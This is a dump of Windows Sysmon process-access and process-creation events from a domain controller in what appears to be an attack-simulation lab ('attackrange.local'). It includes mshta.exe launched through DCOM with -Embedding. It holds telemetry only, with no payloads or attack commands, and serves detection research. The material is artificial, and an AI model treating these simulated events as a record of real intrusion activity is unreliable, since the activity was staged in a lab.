15:59:30.257{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000025408Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.257{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000025407Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.257{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000025406Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.257{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000025405Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.257{7901BC46-4984-6008-0500-00000000A301}6401168C:\Windows\system32\csrss.exe{7901BC46-5362-6008-5906-00000000A301}6304C:\Windows\System32\mshta.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000025404Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.257{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-5362-6008-5906-00000000A301}6304C:\Windows\System32\mshta.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000025403Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.270{7901BC46-5362-6008-5906-00000000A301}6304C:\Windows\System32\mshta.exe11.00.14393.2007 (rs1_release.171231-1800)Microsoft (R) HTML Application hostInternet ExplorerMicrosoft CorporationMSHTA.EXEC:\Windows\System32\mshta.exe -EmbeddingC:\Windows\system32\ATTACKRANGE\Administrator{7901BC46-4A89-6008-6879-0C0000000000}0xc79682HighMD5=5CED5D5B469724D9992F5E8117ECEFB5,SHA256=9D58F407AC581DB4A39066F7CB549BF73709EC3D81EF352801C9FB0235EA7FBC,IMPHASH=BECF3D88380DC97C52B1C2E7B1BCCF4B{7901BC46-4986-6008-0C00-00000000A301}608C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 10341000x800000000000000025402Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.257{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5361-6008-5806-00000000A301}4104C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025401Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.257{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5361-6008-5706-00000000A301}6288C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025400Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.257{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5361-6008-5606-00000000A301}3356C:\Windows\System32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025399Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.257{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5359-6008-4306-00000000A301}4856C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025398Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.257{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5357-6008-3E06-00000000A301}6760C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025397Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.257{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5356-6008-3906-00000000A301}4832C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025396Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.257{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5354-6008-3406-00000000A301}6596C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025395Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.257{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5353-6008-2F06-00000000A301}3716C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025394Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.257{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4405-00000000A301}7000C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025393Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.257{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4305-00000000A301}7420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025392Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.257{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4DC0-6008-FB02-00000000A301}8056C:\Program Files\Internet Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025391Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.257{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A9B-6008-1501-00000000A301}6076C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025390Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.257{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A99-6008-1401-00000000A301}5960C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025389Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.257{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025388Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.257{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FF00-00000000A301}4808C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025387Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 